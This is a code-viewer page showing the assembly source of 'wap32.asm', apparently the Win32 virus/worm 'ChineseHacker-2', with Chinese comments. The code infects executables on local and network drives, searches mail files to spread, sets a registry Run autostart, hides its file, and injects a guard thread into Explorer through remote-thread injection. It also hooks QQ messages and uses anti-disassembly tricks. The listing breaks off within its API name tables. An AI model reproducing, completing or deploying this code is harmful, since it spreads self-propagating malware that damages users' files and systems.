?? wap32.asm
字號:
include wap32.inc
ApiAddressList struc
;Kernel32.DLL
KnlLoadLibraryA dd ?
KnlCreateMutexA dd ?
KnlGetLastError dd ?
KnlGetCommandLineA dd ?
KnlWinExec dd ?
KnlGetDriveTypeA dd ?
KnlSetCurrentDirectoryA dd ?
KnlFindFirstFileA dd ?
KnlFindNextFileA dd ?
KnlFindClose dd ?
KnlSetFileAttributesA dd ?
KnlSetFileTime dd ?
KnlLOpen dd ?
KnlLRead dd ?
KnlLWrite dd ?
KnlLSeek dd ?
KnlLClose dd ?
KnlSleep dd ?
KnlRegisterServiceProc dd ?
KnlGetCurrentProcessId dd ?
KnlOpenProcess dd ?
KnlWriteProcessMemory dd ?
KnlCreateRemoteThread dd ?
KnlCreateKernelThread dd ?
KnlCloseHandle dd ?
KnlWaitForSingleObject dd ?
KnlVirtualAllocEx dd ?
KnlGetSystemDirectoryA dd ?
KnlLCreat dd ?
KnlCreateThread dd ?
KnlTerminateThread dd ?
KnlWideCharToMultiByte dd ?
KnlGetComputerNameA dd ?
KnlGetSystemTime dd ?
;User32.DLL
UserGetWinThreadProcId dd ?
UserFindWindowA dd ?
UserMessageBoxA dd ?
UserGetWindow dd ?
UserSendMessageA dd ?
UserwsprintfA dd ?
;AdvApi32.DLL
AdvRegOpenKeyA dd ?
AdvRegSetValueExA dd ?
AdvRegQueryValueExA dd ?
AdvRegNotifyChange dd ?
;Mpr.DLL
MprWNetOpenEnumA dd ?
MprWNetEnumResourceA dd ?
MprWNetCloseEnum dd ?
;WSock32.DLL
WsWSAStartup dd ?
WsWSACleanup dd ?
Wssend dd ?
Wshtons dd ?
Wsgethostbyname dd ?
Wsconnect dd ?
Wssocket dd ?
Wsclosesocket dd ?
Wsrecv dd ?
;VirusData
DataKnlMzHeader dd ?
DataVirusSize dd ?
DataRemoteThread dd ?
ApiAddressList ends
MAX_BUFF_SIZE=1000h
VirusSize=offset VirusEnd-offset Start+10h
extrn MessageBoxA: proc
extrn ExitProcess: proc
.586p
.model flat,stdcall
.data
Start:
pushad
call VirusEnd
NeedDecode:
mov esi,[esp+4*8]
call PushRunError ;得到意外繼續執行地址
popad
PushXXXCode db 68h ;JmpOldApp
OldEntryRVA dd offset Exit
ret
db 0e9h ;靜態反匯編干擾
PushRunError:
pop ecx
call SetSehFrame
FindKernel32:
and esi,0fffff000h ;得到Kernel.PELoader代碼位置(不精確)
LoopFindKernel32:
sub esi,1000h
cmp word ptr[esi],'ZM' ;搜索EXE文件頭
jnz short LoopFindKernel32
GetPeHeader:
movzx edi,word ptr[esi.PEHeaderOffset]
add edi,esi
mov ebp,[edi.fhExportsRVA]
add ebp,esi ;得到輸出函數表
mov ebx,[ebp.etExportNameList]
add ebx,esi ;得到輸出函數名表
xor eax,eax ;函數序號計數
mov edx,esi ;暫存Kernel32模塊句柄
LoopFindApiStr:
add ebx,04
inc eax ;增加函數計數
mov edi,[ebx]
add edi,edx ;得到一個Api函數名字符串
call PushStrGetProcAddress
db 'GetProcAddress',0
PushStrGetProcAddress:
pop esi ;得到Api名字字符串
xor ecx,ecx
mov cl,15 ;GetProcAddress串大小
cld
rep cmpsb
jnz short LoopFindApiStr
mov esi,edx
mov ebx,[ebp.etExportOrdlList]
add ebx,esi ;取函數序號地址列表
movzx ecx,word ptr[ebx+eax*2]
mov ebx,[ebp.etExportAddrList]
add ebx,esi ;得到Kernel32函數地址列表
mov ebx,[ebx+ecx*4]
add ebx,esi ;計算GetProcAddress函數地址
sub esp,size ApiAddressList+10h ;在堆棧中存放API的地址
mov edi,esp
mov [esp.DataKnlMzHeader],esi
call PushKnlApiStr
LoopRelocKnlApi:
mov ebp,ecx
call ebx,esi
cld
stosd
mov ecx,ebp ;定位Kernel32.dll Api
loop LoopRelocKnlApi
mov eax,[esp.KnlLoadLibraryA]
call PushUser32Str
db 'USER32.DLL',0
PushUser32Str:
call eax
mov esi,eax
call PushUser32ApiStr
LoopRelocUser32Api:
mov ebp,ecx
call ebx,esi
cld
stosd
mov ecx,ebp ;定位User32.dll Api
loop LoopRelocUser32Api
mov eax,[esp.KnlLoadLibraryA]
call PushAdvApi32Str
db 'ADVAPI32.DLL',0
PushAdvApi32Str:
call eax
mov esi,eax
call PushAdvApiStr
LoopRelocAdvApi32Api:
mov ebp,ecx
call ebx,esi
cld
stosd
mov ecx,ebp ;定位ADVAPI32.dll Api
loop LoopRelocAdvApi32Api
mov eax,[esp.KnlLoadLibraryA]
call PushMprStr
db 'MPR.DLL',0
PushMprStr:
call eax
mov esi,eax
call PushMprApiStr
LoopRelocMprApi:
mov ebp,ecx
call ebx,esi
cld
stosd
mov ecx,ebp ;定位MPR.dll Api
loop LoopRelocMprApi
mov eax,[esp.KnlLoadLibraryA]
call PushWsStr
db 'WSOCK32.DLL',0
PushWsStr:
call eax
mov esi,eax
call PushWsApiStr
LoopRelocWsApi:
mov ebp,ecx
call ebx,esi
cld
stosd
mov ecx,ebp ;定位MPR.dll Api
loop LoopRelocWsApi
mov esi,esp ;函數調用列表指針,以后固定不變
call PushMutexName
db 'ChineseHacker-2',0
PushMutexName:
call [esi.KnlCreateMutexA],0,0
call [esi.KnlGetLastError]
or eax,eax ;檢查病毒是否已經運行
jz short ExecOldProgram
int 3; ;人工引發異常執行原程序,JmpOldApp
db 0e9h ;靜態反匯編干擾
ExecOldProgram: ;加載自己,運行老程序
call [esi.KnlGetCommandLineA]
call [esi.KnlWinExec],eax,L 01
call PushNextRunErrorProc;保護注冊表與創建遠程線程
mov esi,esp ;意外繼續執行地址
StartScan:
call PushScanErrorProc;搜索本地與遠程目錄文件
mov esi,esp ;恢復函數調用列表指針
call [esi.KnlSleep],1000*60;*10
jmp short StartScan ;休眠10分鐘重新搜索文件
db 0e9h ;靜態反匯編干擾
PushScanErrorProc:
pop ecx
call SetSehFrame
ScanExeFile:
call GetFoundFileCallBackAddr
lea eax,[edx+offset OptExeFile-offset FoundFileCallBackAddr]
mov [edx],eax ;設置找到文件的處理程序
call GetFoundDirCallBackAddr
lea eax,[edx+offset OptLocalDir-offset FoundDirCallBackAddr]
mov [edx],eax ;設置找到目錄的處理程序
call EnumLogDrive ;搜索本地文件,并傳染病毒
call GetFoundDirCallBackAddr
lea eax,[edx+offset OptNetDir-offset FoundDirCallBackAddr]
mov [edx],eax ;設置找到NET目錄的處理程序
call EnumNetResource ;搜索遠程文件,并傳染病毒
ScanMailFile:
call GetFoundFileCallBackAddr
lea eax,[edx+offset OptMailFile-offset FoundFileCallBackAddr]
mov [edx],eax ;設置找到文件的處理程序
call GetFoundDirCallBackAddr
lea eax,[edx+offset OptLocalDir-offset FoundDirCallBackAddr]
mov [edx],eax ;設置找到目錄的處理程序
call EnumLogDrive ;搜索本地文件,發郵件
call GetFoundDirCallBackAddr
lea eax,[edx+offset OptNetDir-offset FoundDirCallBackAddr]
mov [edx],eax ;設置找到NET目錄的處理程序
call EnumNetResource ;搜索遠程文件,發郵件
CheckRemoteAndWait:
mov eax,[esi.DataRemoteThread]
call [esi.KnlWaitForSingleObject],eax,1000*60;
cmp eax,-1 ;睡眠8小時
jnz short AddWordToQQMsg
NeedCreateRemote:
push esi
call PushWaitErrorProc
pop esi
call GetNetSendMsg
db 'Net Send * My god! Some one killed ChineseHacker-2 Monitor',0
GetNetSendMsg:
pop eax
call [esi.KnlWinExec],eax,0
jmp short CheckRemoteAndWait
PushWaitErrorProc:
pop ecx
call SetSehFrame
call ProcessProtect ;重新啟動遠程線程保護/內帶意外
db 0e9h ;靜態反匯編干擾
AddWordToQQMsg:
call GetVirusBaseInRegEdi
GetVirusBaseInRegEdi:
pop edi
mov eax,[esi.UserFindWindowA];填寫線程用API
mov [edi+offset FindWindowA9x2k-offset GetVirusBaseInRegEdi],eax
mov eax,[esi.UserGetWindow]
mov [edi+offset GetWindow9x2k-offset GetVirusBaseInRegEdi],eax
mov eax,[esi.UserSendMessageA]
mov [edi+offset SendMessageA9x2k-offset GetVirusBaseInRegEdi],eax
mov eax,[esi.KnlSleep]
mov [edi+offset Sleep9x2k-offset GetVirusBaseInRegEdi],eax
lea eax,[edi+offset SendQQMsg-offset GetVirusBaseInRegEdi]
push eax ;創建QQ附加消息線程
call [esi.KnlCreateThread],0,0,eax,eax,0,esp
mov ebx,eax ;保證SendQQMsg線程活動10分鐘
pop eax
CheckRemoteAndWaitAgain:
mov eax,[esi.DataRemoteThread]
call [esi.KnlWaitForSingleObject],eax,1000*60;
push eax ;睡眠10分鐘
call [esi.KnlTerminateThread],ebx,0
pop eax
cmp eax,-1
jz short NeedCreateRemoteAgain
int 3; ;人工意外,繼續搜索文件
db 0e9h ;靜態反匯編干擾
NeedCreateRemoteAgain:
push esi
call PushWaitErrorProcAgain
pop esi
jmp short CheckRemoteAndWaitAgain
PushWaitErrorProcAgain:
pop ecx
call SetSehFrame
call ProcessProtect ;重新啟動遠程線程保護/內帶意外
db 0e9h ;靜態反匯編干擾
PushNextRunErrorProc: ;保護注冊表與創建遠程線程
pop ecx
call SetSehFrame
RegisterProtect:
sub esp,100h ;構造病毒路徑
call BuildVirusPathInStack,esp
mov edi,esp
call [esi.KnlLCreat],edi,10h
cmp eax,-1h ;創建獨占文件
jz short OptRegister
mov ebx,eax
call UnzipVirusToFile;解壓PE文件
call [esi.KnlLSeek],ebx,0,0
call FixPeFile,ebx ;傳染病毒給PE文件,不關閉文件,防刪除
mov edi,esp ;把病毒設置為:隱藏+系統+只讀
call [esi.KnlSetFileAttributesA],edi,7h
OptRegister:
push eax
push esp
call PushRegKeyStr
db 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run',0
PushRegKeyStr:
call [esi.AdvRegOpenKeyA],080000002h
pop ebx
mov eax,esp
call PushKeyNameStr ;修改注冊表,自動Run項目
db 'Runonce',0
PushKeyNameStr:
pop ecx
call [esi.AdvRegSetValueExA],ebx,ecx,0,1,eax,100h
call GetVirusBaseInEdi
GetVirusBaseInEdi:
pop edi ;得到病毒位置參照偏移量
mov eax,[esi.AdvRegQueryValueExA];填寫API地址
mov [edi+offset AdvRegQueryValueExA9x2k-offset GetVirusBaseInEdi],eax
mov eax,[esi.AdvRegSetValueExA]
mov [edi+offset AdvRegSetValueExA9x2k-offset GetVirusBaseInEdi],eax
mov eax,[esi.AdvRegNotifyChange]
mov [edi+offset AdvRegNotifyChangeKeyValue9x2k-offset GetVirusBaseInEdi],eax
lea eax,[edi+offset RegisterProtectProc-offset GetVirusBaseInEdi]
push eax ;創建注冊表監視線程
call [esi.KnlCreateThread],0,0,eax,ebx,0,esp
pop eax ;不關閉注冊表句柄,監視線程續用
ProcessProtect: ;創建遠程線程
xor eax,eax
mov [esi.DataRemoteThread],eax
sub esp,100h
call BuildVirusPathInStack,esp
call GetVirusBaseInEdiAgain
GetVirusBaseInEdiAgain:
pop edi ;得到病毒位置參照偏移量
mov eax,[esi.KnlOpenProcess];填寫API地址
mov [edi+offset KnlOpenProcess9x2k-offset GetVirusBaseInEdiAgain],eax
mov eax,[esi.KnlWaitForSingleObject]
mov [edi+offset KnlWaitForSingleObject9x2k-offset GetVirusBaseInEdiAgain],eax
mov eax,[esi.KnlWinExec]
mov [edi+offset KnlWinExec9x2k-offset GetVirusBaseInEdiAgain],eax
mov eax,[esi.KnlRegisterServiceProc]
or eax,eax ;依靠函數RehSvrProc來假定操作系統類別9x/2k
jz short Process2kProtect
Process9xProtect:
call eax,L 0,L 1 ;在Win9x下先隱藏本進程,一級保護
mov edx,[esi.DataKnlMzHeader]
movzx ebx,word ptr[edx.PEHeaderOffset]
add ebx,edx
mov ecx,[ebx.fhObjectTable00.otRVA]
mov ebp,[ebx.fhHeaderSize]
sub ecx,ebp
cmp ecx,200h
jb short Process9xProtectEnd
add ebp,edx ;查詢Knl空間
lea edx,[edi+offset ProcessProtectProc-offset GetVirusBaseInEdiAgain]
call MoveDataToKnl,edx,ebp,ProcessProtectProcSize
lea ecx,[ebp+ProcessProtectProcSize]
mov edx,esp ;復制線程代碼數據到Kernel32.dll
call MoveDataToKnl,edx,ecx,100h
call [esi.KnlGetCurrentProcessId]
push eax ;創建Kernel線程,未公開函數
call [esi.KnlCreateKernelThread],0,0,ebp,eax,0,esp
mov [esi.DataRemoteThread],eax
pop eax ;啟動進程保護線程
call [esi.KnlSleep],500
Process9xProtectEnd:
int 3 ;人工異常
db 0e9h ;反匯編干擾
Process2kProtect: ;填寫API地址
call [esi.UserFindWindowA],0,0
push eax ;找Explorer進程/或者Top窗口程序
call [esi.UserGetWinThreadProcId],eax,esp
call [esi.KnlOpenProcess],PROCESS_ALL_ACCESS,0
or eax,eax ;打開該進程
jz short Process2kProtectEnd
mov ebx,eax
call [esi.KnlVirtualAllocEx],ebx,NULL,200h,MEM_COMMIT,L 40h
or eax,eax
jz short Close2kHandle
mov ebp,eax ;分配遠程空間
lea edx,[edi+offset ProcessProtectProc-offset GetVirusBaseInEdiAgain]
push eax
call [esi.KnlWriteProcessMemory],ebx,ebp,edx,ProcessProtectProcSize,esp
pop eax ;復制代碼到遠程地址空間
cmp eax,ProcessProtectProcSize
jnz short Close2kHandle
mov edx,esp
lea ecx,[ebp+ProcessProtectProcSize]
push eax
call [esi.KnlWriteProcessMemory],ebx,ecx,edx,100h,esp
call [esi.KnlGetCurrentProcessId]
call [esi.KnlCreateRemoteThread],ebx,NULL,NULL,ebp,eax,NULL,esp
mov [esi.DataRemoteThread],eax
pop eax ;啟動進程保護線程
Close2kHandle:
call [esi.KnlCloseHandle],ebx
call [esi.KnlSleep],500
Process2kProtectEnd:
int 3 ;人工異常
db 0e9h ;反匯編干擾
PushKnlApiStr: ;:ecx=函數名個數
pop eax ;彈出返回地址
mov ecx,esp
call PushKnlApiStr33
db 'GetSystemTime',0
PushKnlApiStr33:
call PushKnlApiStr32
db 'GetComputerNameA',0
PushKnlApiStr32:
call PushKnlApiStr31
db 'WideCharToMultiByte',0
PushKnlApiStr31:
call PushKnlApiStr30
db 'TerminateThread',0
PushKnlApiStr30:
call PushKnlApiStr29
db 'CreateThread',0
PushKnlApiStr29:
call PushKnlApiStr28
db '_lcreat',0
PushKnlApiStr28:
call PushKnlApiStr27
db 'GetSystemDirectoryA',0
PushKnlApiStr27:
call PushKnlApiStr26
db 'VirtualAllocEx',0
PushKnlApiStr26:
call PushKnlApiStr25
db 'WaitForSingleObject',0
PushKnlApiStr25:
call PushKnlApiStr24
db 'CloseHandle',0
PushKnlApiStr24:
call PushKnlApiStr23
db 'CreateKernelThread',0
PushKnlApiStr23:
call PushKnlApiStr22
db 'CreateRemoteThread',0
PushKnlApiStr22:
call PushKnlApiStr21
db 'WriteProcessMemory',0
PushKnlApiStr21:
call PushKnlApiStr20
db 'OpenProcess',0
PushKnlApiStr20:
call PushKnlApiStr19
db 'GetCurrentProcessId',0
PushKnlApiStr19:
call PushKnlApiStr18
db 'RegisterServiceProcess',0
PushKnlApiStr18:
call PushKnlApiStr17
db 'Sleep',0
PushKnlApiStr17:
call PushKnlApiStr16
db '_lclose',0
PushKnlApiStr16:
call PushKnlApiStr15
db '_llseek',0
PushKnlApiStr15:
call PushKnlApiStr14
db '_lwrite',0
PushKnlApiStr14:
call PushKnlApiStr13
db '_lread',0
PushKnlApiStr13:
call PushKnlApiStr12
db '_lopen',0
PushKnlApiStr12:
call PushKnlApiStr11
db 'SetFileTime',0
PushKnlApiStr11:
call PushKnlApiStr10
db 'SetFileAttributesA',0
PushKnlApiStr10:
call PushKnlApiStr09
db 'FindClose',0
PushKnlApiStr09:
call PushKnlApiStr08
db 'FindNextFileA',0
PushKnlApiStr08:
call PushKnlApiStr07
db 'FindFirstFileA',0
PushKnlApiStr07:
call PushKnlApiStr06
db 'SetCurrentDirectoryA',0
PushKnlApiStr06:
call PushKnlApiStr05
db 'GetDriveTypeA',0
PushKnlApiStr05:
call PushKnlApiStr04
db 'WinExec',0
PushKnlApiStr04:
call PushKnlApiStr03
db 'GetCommandLineA',0
PushKnlApiStr03:
call PushKnlApiStr02
db 'GetLastError',0
PushKnlApiStr02:
call PushKnlApiStr01
db 'CreateMutexA',0
PushKnlApiStr01:
call PushKnlApiStr00
db 'LoadLibraryA',0
PushKnlApiStr00:
sub ecx,esp
shr ecx,2
jmp eax
db 0e9h ;靜態反匯編干擾
PushUser32ApiStr:
pop eax
mov ecx,esp
call PushUser32ApiStr05
db 'wsprintfA',0
PushUser32ApiStr05:
call PushUser32ApiStr04
db 'SendMessageA',0
PushUser32ApiStr04:
call PushUser32ApiStr03
db 'GetWindow',0
PushUser32ApiStr03:
call PushUser32ApiStr02
db 'MessageBoxA',0
?? 快捷鍵說明
復制代碼
Ctrl + C
搜索代碼
Ctrl + F
全屏模式
F11
切換主題
Ctrl + Shift + D
顯示快捷鍵
?
增大字號
Ctrl + =
減小字號
Ctrl + -